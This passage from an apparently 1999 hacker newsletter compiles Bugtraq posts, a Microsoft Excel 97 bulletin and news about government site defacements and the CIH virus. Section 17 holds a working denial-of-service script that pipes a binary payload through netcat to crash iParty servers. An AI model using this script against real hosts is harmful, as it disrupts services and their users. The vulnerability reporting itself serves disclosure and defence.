--------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
17.0 iParty pooper
~~~~~~~~~~~~~
Approved-By: aleph1@UNDERGROUND.ORG
Received: from hotmail.com (law2-f15.hotmail.com [216.32.181.15]) by
netspace.org (8.8.7/8.8.7) with SMTP id NAA20477 for
<bugtraq@netspace.org>; Sat, 8 May 1999 13:10:37 -0400
Received: (qmail 46545 invoked by uid 0); 8 May 1999 17:11:35 -0000
Received: from 142.169.181.31 by www.hotmail.com with HTTP; Sat, 08 May 1999
10:11:34 PDT
X-Originating-IP: [142.169.181.31]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_e6987ad_6338d761$45c2e550"
Message-ID: <19990508171135.46544.qmail@hotmail.com>
Date: Sat, 8 May 1999 13:11:34 EDT
Reply-To: wh00t X <bugtraq2@HOTMAIL.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: wh00t X <bugtraq2@HOTMAIL.COM>
Subject: iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)
X-cc: jaldrich@bumpkinland.com, packetstorm@genocide2600.com
To: BUGTRAQ@netspace.org
Content-type: text/plain; format=flowed;
Hi,
iParty, by Intel Experimental Technologies Department, (unofficial
information source at http://www.bumpkinland.com/iparty/), is a small voice
conferencing program, which includes a server daemon in the download. It is
handy for quick internet voice chat, but the server can be killed by sending
a large amount of extended characters to the server port, which is 6004 by
default, without being logged. The daemon either crashes quietly or GPF
(varies from box to box).
I've been told an advisory of some sort has already been released for
this particular vulnerability but I believe the matter needs further
attention because:
1. While there are other newer and better voice conferencing programs out,
iParty continues to be widely used.
2. This vulnerability may be worse than thought: I tested my program
(attached to message) against 4 random Windows 95/98 boxes with the daemon
running, and after 2 or 3 crashes in a row, on top of crashing the iParty
daemon, some experienced disconnection from the internet, ICQ and/or
Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash.
Thanks,
Ka-wh00t
_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.comContent-Type: text/plain; name="ippooper.sh"
Content-Disposition: attachment; filename="ippooper.sh"
X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id SAA23880
ippooper.sh
#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.
if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6�]}tTյ?"̐a�p/�H�D�0iA�L%�̂EBEԁ�'*}�y�ԥ(3�z��n�u�ԏj+��(֗ք�d'����ZiX��y7
�'``ϝ C�����ʹ�������>�ܐE�6��^��^ v�?�^�:��{n"u���'g=o��
�8�Ӂ'L5"�鲱��ᤁ�DRG�I�lq�Y�g���i��iվ�H�H�w��ὲ��3�l��*o�#�sC9m,
_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi
@HWA
18.0 Microsoft Security Advisory Bulletin: Excel 97 virus patch (MS99-14)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-014)
--------------------------------------
Patch Available for Excel 97 Virus Warning Vulnerabilities
Originally Posted: May 7, 1999
Summary
=======
Microsoft has released a patch that eliminates vulnerabilities in the Excel
97 virus warning mechanism. The patch is fully supported, and Microsoft
recommends that affected customers download and install it, if appropriate.
Issue
=====
Microsoft Excel 97 provides a feature that warns the user before launching
an external file that could potentially contain a virus or other malicious
software. This feature allows the user to weigh the risk of opening the
file, based on its origin, the network it is located on and the security
practices in operation there, the sensitivity of the data on the user's
computer, and other factors.
However, certain scenarios have been identified that could be misused to
bypass the warning mechanism. In general, they require the use of
infrequently-combined features and commands, and are unlikely to be
encountered in normal use. This patch addresses these issues so that they
cannot be taken advantage of by a malicious user.
While there are no reports of customers being adversely affected by any of
the vulnerabilities eliminated by the patch, Microsoft is proactively
releasing the patch to allow customers to take appropriate action to protect
themselves against it. These fixes are already built into Excel 2000 and
users of that product will not need to download this patch.
Affected Software Versions
==========================
- Microsoft Excel 97
What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.
Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.
(Note: It might take 24 hours from the original posting of this bulletin
for the KB article to be visible in the Web-based Knowledge Base.)
What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that
this vulnerability poses to their systems and determine whether to download
and install the patch. The patch can be found at:
- http://officeupdate.microsoft.com/downloaddetails/xl8p6pkg.htm
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Patch Available for Excel 97 Virus Warning Vulnerabilities
(the Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- May 7, 1999: Bulletin Created.
For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
--------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
19.0 LISA install leaves root access: Openlinux 2.2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
X-From_: linux-security-request@redhat.com Sun May 9 05:45:16 1999
Date: Sat, 8 May 1999 23:46:40 -0400 (EDT)
From: Andrew McRory <amacc@mailer.org>
X-Sender: amacc@ns1.mailer.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Message-ID: <Pine.LNX.4.02.9905082300390.13930-100000@ns1.mailer.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Subject: [linux-security] OpenLinux 2.2: LISA install leaves root access without password
Hello,
I believe I've found a bug in the installation process of OpenLinux 2.2
when using the LISA boot disk. During the installation a temporary passwd
file is put on the new file system containing the user "help" set uid=0
gid=0 and no password. Once you are prompted to set the root password and
default user password a new passwd and shadow file is created yet the help
user is left in the shadow file with, you guessed it, no password... Here
are the offending entries:
/etc/passwd
help:x:0:0:install help user:/:/bin/bash
/etc/shadow
help::10709:0:365:7:7::
Anyone who installed OpenLinux 2.2 using the LISA boot disk should check
their password file now ;-)
I found this using a cdrom I made from a mirror of the mirror at
ftp.tux.org. Just to make sure I wasn't mixed up I redownloaded the
install.144 file from ftp.calderasystems.com and tried again. Same thing.
The install disk is version 137 dated 26Mar99 (displayed on the boot
message).
I wrote Caldera a message late in the day Friday regarding this bug but
haven't heard back from anyone. I've tried to resist posting this until I
hear back but I really feel people should know now!!
PS: I'm not sure if Lizard, the graphical installation method, has this
problem. It crashes before it does much here.... that's why I tried LISA.
Thanks,
Andrew McRory - amacc@linuxsys.com ***********************************
Linux Systems Engineers / The PC Doctors *
3009-C West Tharpe Street - Tallahassee, FL 32303 *
Voice 850.575.7213 ***************************************************
--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------
To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null
@HWA
20.0 BUGTRAQ receives a plaque at SANS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 08:46:48 -0700
Reply-To: Aleph One <aleph1@UNDERGROUND.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Aleph One <aleph1@UNDERGROUND.ORG>
Subject: Adminisrivia
To: BUGTRAQ@netspace.org
The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
a plaque during the SANS conference now happening at Baltimore for being
one of the three most valuable security publications. This is in response
to a survey the did at an earlier conference. I'd like to thank SANS
for the gesture. Although I accepted the plaque it is really for all of
you. Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 12:52:22 -0400
Reply-To: Brian Fisk <bfisk@netspace.org>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Brian Fisk <bfisk@netspace.org>
Subject: Re: Adminisrivia
To: BUGTRAQ@netspace.org
In-Reply-To: <19990510084648.C29946@underground.org>
I would also like to thank the SANS Institute on behalf of NetSpace, as
they also donated a sizable chunk of money for a mail server upgrade as
part of the same award. This donation, combined with other donations from
the Bugtraq community in the past allowed us to double (or potentially
even more) our mail delivery capacity for this list as well as all the
others that NetSpace serves. Thanks to everyone here who makes this list
what it is.
Brian Fisk
NetSpace Administrator
On Mon, 10 May 1999, Aleph One wrote:
> The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
> a plaque during the SANS conference now happening at Baltimore for being
> one of the three most valuable security publications. This is in response
> to a survey the did at an earlier conference. I'd like to thank SANS
> for the gesture. Although I accepted the plaque it is really for all of
> you. Cheers.
>
> --
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>
--
Brian Fisk bfisk@netspace.org
@HWA
21.0 White House takes server offline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
White House Takes Server Offline
contributed by Weld Pond
In order to conduct an "Admistrative Review" the White House took its web server offline and
also closed off all e-mail to and from the outside world. This comes after what HNN believes
to be a successful crack of the www1. server at 8:50am EST Monday morning. This crack was
_not_ related to other recent .gov/.mil cracks nor was this crack strongly related to the
Chinese embassy bombing or had any other political motives. Other mainstream news outlets
are getting their stories confused. (If you only read one of these articles I recommend the
one by Brock Meeks of MSNBC, it seems to be the most thorough.)
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
MSNBC
http://www.msnbc.com/news/268339.asp
Heise.de
http://www.heise.de/newsticker/data/fr-11.05.99-000/
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/whhack990511.html
C|Net
http://www.news.com/News/Item/0,4,36431,00.html?st.ne.fd.mdh.ni
CNN
http://www.cnn.com/TECH/computing/9905/12/white.house.site.01/index.html
Nando Times
http://www.techserver.com/story/body/0,1634,47750-77011-550124-0,00.html
MSNBC
White House Web site shut down
Purported attacker says there was no political motive
By Brock N. Meeks and Alan Boyle
MSNBC
WASHINGTON, May 11 The White House shut down its public Web site for more than 24 hours
because of computer attacks, a spokesman said Tuesday. Government Web sites have sustained
a wave of assaults apparently aimed at protesting last week�s NATO bombing of the Chinese
Embassy in Belgrade. However, in an interview with MSNBC, a computer user who claimed a
role in the White House Web break-in denied that there was a political motive.
AN ATTEMPT was made to break into the system that operates the Web page yesterday morning,
White House spokesman Barry Toiv told MSNBC Tuesday, and so what we�ve done is use existing
procedures to limit access to the system so we could make a full assessment.The Web site was
back in operation by Wednesday morning.
Computer attacks on government Web sites have taken on a higher profile in the wake of Friday�s
embassy bombing, which left three dead and 20 injured. The bombing, which NATO said was due to an
intelligence error, sparked a wave of demonstrations at the U.S. Embassy in Beijing, as well as
widespread criticism online and offline.
A variety of federal sites have been defaced by political protesters. But the primary motivation
behind the attack on the White House site was merely to show that it could be done, a teen-ager who
said he was involved in the attack told MSNBC.
A telephone conversation with the 18-year-old was arranged by a mutually trusted intermediary. The
teen, who claimed to be a member of the group known as gH or Global Hell, spoke on the condition that
neither his real name nor his hacker nickname would be published. To back up his claim, he provided
internal user logs listing White House staff. His account also was consistent with other reports
provided by trusted third parties.
`JUST LUCK�
The teen said the White House Web break-in was actually just luck. Members of gH caught the White
House system administrator transferring log files in an insecure manner via an unsecured FTP site that
was snooped out from another box (computer), he told MSNBC.
I have no idea why they would do that Whoever that admin was, he didn�t know what he was doing, he
said. Along with gH, a group calling itself the Hong Kong Danger Duo took part in the White House hack,
the teen said.
He said the White House hack lasted for only a few minutes, due to what is known as a crontab, a timed
command set by the system administrator. This command automatically refreshes the entire site with identical
content from a secure server to help guard against the kind of attack that took place Monday.
OTHER DEPARTMENTS HIT
Government sources told NBC News that attackers also hit the Web servers for the departments of Energy,
Interior and Labor, as well as the U.S. Information Agency�s Web site. All those Web sites were in service
Tuesday afternoon, although traffic to the Energy Department�s Web site was redirected to a numerical
Internet address.
The sources said the intruders left behind cyber-graffiti slogans saying, for example, You bombed the
Chinese Embassy, this is what you�re going to get. Some of the graffiti was in Chinese characters, the
sources said.
In all cases, the Web computer servers contained only publicly available information, and no classified
information was compromised, officials emphasized.
The politically motivated attacks on departmental Web sites appear to be unrelated to the White House attacks.
The teen from gH said he had no idea who carried out the other computer attacks, an assertion that meshed with
other reports.
Several hacker-oriented sites including AntiOnline as well as Hacker News Network and Attrition.Org
posted what they said were copies of the White House hack. A message hidden inside the source code for the page
reads: You found my elite hidden source. Wow. Ok, no real msg here. Stop all the war, no point for it. This box
wasn�t ever secure.
Brian Martin, who runs the Attrition.Org site, said the stop all the war reference doesn�t mean the attack was
launched with politics in mind.A lot of hackers will do that to kind of justify what they are doing, Martin said.
They hacked this site because they could, he said. They saw a window of opportunity and took it.
The White House site is operated under contract by PSINet of Herndon, Va.
NBC News correspondent Jim Miklaszewski and
MSNBC�s Bob Sullivan contributed to this report.
@HWA
22.0 Feds to install IDS
~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Feds Look to Install IDS
contributed by erewhon
The GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National
Infrastructure Protection Center (jeeez, think they enough people working on this?) are working on a
Federal Intrusion Detection Network (FIDNET) which will provide a common center for response to cyber
attacks on agencies.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-fidnet-5-11-99.html
MAY 11, 1999 . . . 18:10 EDT
Agencies lay groundwork for intrusion-detection
network
BY DIANE FRANK (dfrank@fcw.com)
A group of federal agencies has completed the initial model of a
governmentwide intrusion-detection network that will provide a common
center for response to cyberattacks on agencies.
The Federal Intrusion Detection Network (FIDNET) is in the very early
stages of development, and the group of federal agencies heading the
development effort recently agreed on possible agency responsibilities and a
reporting structure, said Tom Burke, assistant commissioner of information
security at the General Services Administration's Federal Technology Service,
today at the Outlook 2000 conference in Falls Church, Va.
GSA, the Critical Infrastructure Assurance Office, the National Security
Agency and the FBI's National Infrastructure Protection Center are all
developing FIDNET as part of President Clinton's directive to protect the
nation's mission-critical systems. The system is intended to provide all
agencies with intrusion-detection systems that will allow agencies to locate
incidents across the government as soon as they occur. It also will serve as a
center for analysis of intrusions or attacks.
The system will be made of three main blocks, with the civilian agencies
reporting to the Defense and intelligence agencies and possibly a full-time
program management office overseeing the whole system. FIDNET is based
on the Defense Department's incident-reporting network, which is much
further along than the efforts in the civilian agencies. "We're looking to
leverage the work that has already been done at Air Force and DOD so we
don't duplicate their effort," Burke said.
The blocks eventually will include a similar network being developed in the
private sector and the Federal Computer Incident Response Capability center
at GSA, Burke said.
@HWA
23.0 CIH Damages climb in China
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
360,000 Systems Damaged in China
Contributed by DongWong
A survey released earlier this month indicate that at least 360,000 systems where damaged by
the CIH or Chernobyl virus. The damage was estimated at Rmb1 million (US$120 million). The
survey was conducted by Beijing Rising Computer Science and Technology Development Co., Ltd.,
a Chinese anti virus company.
Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/57681
24.0 Company claims damages in web page defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Company Claims Damages From Attack
contributed by War3z Dud3
An Issaquah, Washington high-tech company is claiming thousands of dollars worth of damage after
it had it web page defaced. The defaced page was a protest of NATOs bombing of the Chinese Embassy
in Belgrade. The FBI is investigating and have claimed to have tracked the attackers to New York,
one in Massachusetts, and another in St. Louis.
Yahoo Daily News
http://dailynews.yahoo.com/headlines/local/state/washington/story.html?s=v/rs/19990510/wa/index_2.html#2
Internet Company Hit By Hackers - (ISSAQUAH) -- An Issaquah
high-tech company is dealing with thousands of dollars in damage, thanks to the Chinese embassy
bombing in Belgrade. Michael Renz at webcityusa-dot- com went online last night to update his
websites for a dozen local businesses. That's when he realized someone had destroyed them. In
their place, the hackers had placed graphic pictures of embassy bombing victims and hate messages
blasting the U-S and NATO. Authorities, including the FBI, are investigating and have reportedly
traced the action to three different university websites: one in New York, one in Massachusetts,
and another in St. Louis.
@HWA
25.0 Three .gov sites hacked
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Three Gov Servers Cracked in Protest of Embassy Bombing
contributed by Space Rogue
The Department of Energy, The Department of the Interior, and the National Park Service all had their
web sites defaced in protest of the NATO bombing of the Chinese Embassy in Yugoslavia. The defaced
pages included pictures of the people killed in the bombing.
ABC News
http://abcnews.go.com/sections/world/DailyNews/kosovo_chinacyber_990509.html
Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-11may1999-2.htm
C|Net
http://www.news.com/News/Item/0,4,36311,00.html?owv
CNN
http://www.cnn.com/TECH/computing/9905/10/hack.attack.02/index.html
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nato-5-10-99.html
ITN
http://www.itn.co.uk/World/world19990510/051005w.htm
Federal Computer Week;
MAY 10, 1999 . . . 14:25 EDT
Hackers retaliate after NATO bombing
BY BRAD BASS (brad_bass@fcw.com)
A group of Chinese hackers defaced the home pages of the departments of
Energy and Interior this past weekend, apparently in retaliation for NATO's
accidental bombing of the Chinese embassy in Belgrade.
The hackers claimed their motives were not political but were a response to
the death of Chinese journalists resulting from NATO's attack. The messages
were written in Chinese and English.
The hackers referred to the bombing as a "Nazi action" and urged NATO,
and specifically the United States, to accept responsibility. "You have owed
[sic] Chinese people a bloody debt which you must pay for," said a message
on the DOE Web site on Sunday afternoon. "We won't stop attacking until the
war stops!"
A spokesman for iDefense, an information clearinghouse on critical
infrastructure protection, said the attack probably did little harm but
characterized it as "a warning sign" to the government.
"It's just another sign that these types of things are easy to accomplish if you
have a modem and a little technical knowledge," the spokesman said. "It's not
too far removed from taking it to another more harmful level."
-=-
C|Net;
Chinese attack embassy bombing on Net
By Reuters
Special to CNET News.com
May 10, 1999, 8:15 a.m. PT
URL: http://www.news.com/News/Item/0,4,36311,00.html
BEIJING--Chinese computer buffs flooded cyberspace with anti-U.S. rhetoric today,
hacking into a U.S. embassy Web site and overloading chat rooms with condemnation of
the NATO bombing in Yugoslavia.
As angry protesters hit the pavement in a more traditional form of outrage, hurling
whatever came to hand at the U.S. and British embassies in Beijing, China's wired
elite logged on to vent their anger.
More than 24,000 protest messages have been posted on one popular chatroom at Netease.com
since three NATO missiles slammed into the Chinese embassy compound in Belgrade Friday night,
killing three journalists and injuring more than 20 people.
Most of the postings were one-line invectives against President Clinton or the NATO bombing
campaign in Yugoslavia. But others focused on ways to retaliate for the strike.
"Our strongest weapon is for the masses to begin a campaign to boycott American goods," wrote
one user. "This is what the Americans are most scared of.Americans love money and they listen
the most to taxpayers. If they lose economic gains then they lose the essentials."
Another user, writing under the name "KILL-USA," called on China to make use of the situation
to push for entry into the World Trade Organization.
One urged his counterparts to pirate U.S. software to cripple the American economy.
Others condemned students and workers who had attacked foreign journalists covering violent
protests outside the U.S. embassy over the weekend.
"The anger in our hearts must not lead us to lose reason and curse and beat foreigners when we
see them," wrote a user called Chinese Kung Fu.
The outpouring of angst on the Web was so great that many of China's most popular sites added
additional servers to keep up with the demand.
The popular Sohu.com also set up a special site to gather responses to the attack on the Chinese
embassy and was receiving one response every second earlier
today.
In addition to the Web postings, Chinese hackers twice assailed the U.S. embassy Web site,
replacing the home page with text reading "down with barbarians," the state-run China Daily reported.
Today the Web site could be accessed through an American server, but the Chinese route was blocked.
Word of the bombing spread rapidly on the Internet--in contrast to the many hours the official media
took to report it--and many students said they first heard about street protests in Beijing on the Web.
More than 2 million Chinese use the Internet, one of the only forums of expression free from government
oversight.
Story Copyright � 1999 Reuters Limited. All rights reserved.
@HWA
26.0 Full Disclosure, the only way to go.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Full Disclosure - The Only Way to Be Sure
contributed by remage
A rather interesting rant has been posted by L0pht Heavy Industries, Inc. The rant covers
the issue of Full Disclosure which has been argued about and argued about. In the wake of
the recent showcode-Webtrends-L0pht-Microsoft advisory the L0pht makes a very convincing
argument that Full Disclosure is the only way to protect those who are
vulnerable.
L0pht Heavy Industries, Inc.
http://www.l0pht.com/
05.10.1999
There is a new trend in the reporting of security vulnerabilities
these days. Many of the problems are being reported by companies
that make products to detect these problems. While more people
researching the security of products is a good thing, it is certainly
having an effect on the free flow of security information.
Sometimes this effect is to the detriment of the customers of the
product that the flaw exists in.
If a company makes a product that scans for security problems,
they are going to want to add their newly discovered vulnerability
to their list of things to scan for. They are probably, depending on
the seriousness of the problem they have uncovered, going to want
to make the advisory of the problem into a full scale press release
that will hype their product. Usually the press release won't really
tell you how to find the problem or how to solve it. You are going to
need to download their product for that.
When security problems exist on production servers accessible from
the internet, time is critical. Every day that goes by is another day
that the server is exposed. How many people know about the
problem? Who is actively exploiting it? It is impossible to tell. Good
ethical security practice is to tell the people effected quickly,
especially if there are steps they can take to mitigate or eliminate
the risk themselves.
The L0pht recently found a problem with Microsoft's IIS 4.0 web
server, the showcode problem. It allowed web users to read files
anywhere on the web server that the file permissions were set to
be world-readable. This turns out to be the case in many web
servers that are not locked down properly. The L0pht was surprised
at how widespread the problem was. Many high profile e-commerce
servers were effected. Many, many corporate web servers were
effected.
The research of the problem, which took less than a day, came up
with a simple solution. Delete the sample files which made the
machine vulnerable. They don't need to be on production servers
anyway. We crafted an advisory and gave out the solution.
When we reported this to Microsoft they said that they had known
about the problem for "several weeks". They had been notified by
WebTrends about the problem, were researching it, and would issue
a Security Bulletin. It didn't seem to be that so complicated an
issue that would take several weeks to research. And the fix was
simple. Just delete the files. No need to download a hotfix or even
tweak the registry. What was taking so long?
The L0pht released the showcode advisory to Bugtraq, computer
industry reporters, and Microsoft on May 7, 1999, 9:30am EST.
Later that day, approximately 1:40 pm EST, WebTrends released a
press release about the same problem. It spoke of how WebTrends
had discovered the problem. The WebTrends press release didn't
tell how to detect the problem and had no solution to the problem.
Two things that were present in the L0pht advisory. It seemed that
you had to download and run their product if you wanted this
information.
It makes one wonder if the press release was put out at that
particular time because the L0pht had informed the public about the
problem first. It makes one wonder why Microsoft kept this problem
and easy solution to themselves for several weeks.
Many crackers keep security vulnerabilities secret so that they can
exploit them without worrying about vendor patches or fixes by
system administrators. This is looked down upon highly by the
security community as totally unethical. Why keep the
vulnerabilities secret unless you are going to exploit them, or
perhaps trade them for something?
Now we have software vendors keeping things secret. At least
secret for a substantial period of time. Is this the way we want the
industry to behave?
This is why full disclosure mailing lists such as Bugtraq and web
sites such as Packet Storm Security are so important. They allow
customers to get vulnerability reports, and hopefully fixes, in a
timely manner. There is no centralized clearinghouse such as the
software vendor or some government agency to slow things up for
their own ends.
Vulnerability information is extremely valuable both to attackers and
customers. Companies and organizations that release this
information openly and as soon as possible are doing the security
community a service. Those who choose to use the information for
their own purposes first put customers at risk.
@HWA
27.0 NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NIPC releases CyberNotes
contributed by Simple Nomad
The National Infrastructure Protection Center (NIPC), which is essentially being run by the FBI,
has released online copies of "CyberNotes", the newsletter whose mission is to "support security
and information system professionals with timely information on cyber vulnerabilities, hacker
exploit scripts, hacker trends, virus information, and other critical infrastructure-related best
practices". It reads like a government version of numerous hacker web sites. Our tax dollars at work.
NIPC Cyber Notes
http://www.nipc.gov/nipc/nipcpublic.htm
Oh, and if you have never visited the NIPC web site it is
good for a laugh or two.
National Infrastructure Protection Center
http://www.nipc.gov/
@HWA
28.0 Cure for CIH
~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Cure for CIH Found
contributed by Scores
A student in Bangladesh claims to have found a cure for the CIH or Chernobyl virus that wipes out thousands of
systems world wide last month. Monirul Islam Sharif, an undergraduate computer science student claims that a
70K-byte C language program he has named MRECOVER will recover the FAT table and the first partition of a
FAT16 table.
Computer World
http://www.computerworld.com/home/news.nsf/all/9905101cih
MRECOVER
http://members.xoom.com/monirdomain
Student touts 'Chernobyl' cure
By Sanjit Singh
NEW DELHI -- One student invented it, but another has written an antidote to help users who lost data to the CIH
computer virus.
The Chernobyl virus, also known as CIH, was invented by onetime Taiwanese student Chen Ing-hau and
caused havoc all over Asia April 26, infecting thousands of PCs in South Korea, Singapore, India, Bangladesh
and China. (Most major U.S. corporations with updated antivirus software escaped serious damage.) But it now
has a cure, courtesy of Monirul Islam Sharif, an undergraduate computer science student at Dhaka
University in Bangladesh.
Sharif, 21, said he wrote the 70K-byte C language program, which he called MRECOVER, in 24 hours.
"I started working on it on April 27, when a friend brought his infected hard drive to me, and by the next day, it
worked when I tried it out. Most of the data on the disk was recovered," he said.
Sharif tried it on several other computers at Dhaka, and it worked there, too, recovering data in minutes.
"If your machine uses FAT [File Allocation Table], MRECOVER will recover all the data on the disk within
